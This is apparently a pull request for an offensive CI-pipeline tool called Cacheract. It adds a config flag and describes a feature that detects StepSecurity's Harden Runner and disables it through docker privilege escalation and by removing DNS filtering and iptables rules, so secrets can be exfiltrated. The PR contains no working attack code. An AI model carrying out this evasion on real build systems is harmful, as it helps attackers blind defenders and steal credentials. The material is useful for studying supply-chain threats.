### PR TITLE
Bypass Step Security Harden Runner (if running)

### DIFF
--- a/src/config.ts
+++ b/src/config.ts
@@ -13,6 +13,8 @@ export type ManualCacheEntry  = {
 // Time in second to sleep after each payload detonation.
 export const SLEEP_TIMER: number = 15;
 
+export const SOFTEN_RUNNER: boolean = false;
+
 // Number of GBs to stuff the cache with upon the 
 // initial execution.
 export const FILL_CACHE: number = 0;


### PR DESCRIPTION
This PR adds a feature to check if StepSecurity's harden runner is running in the build. If it is, then Cacheract will:

* Check if sudo is disabled. If it is, then it will use an embedded alpine docker image to privesc and store sudo access.
* It will unset the DNS filtering and remove the harden runner block functionality.
* It will remove IP tables filter rules set by Harden Runenr.

After this, Cacheract will be able to exfiltrate values without any problems. Helpful for initial exploitation in harden-runner protected workflows as well as detonation in a workflow protected by harden runner.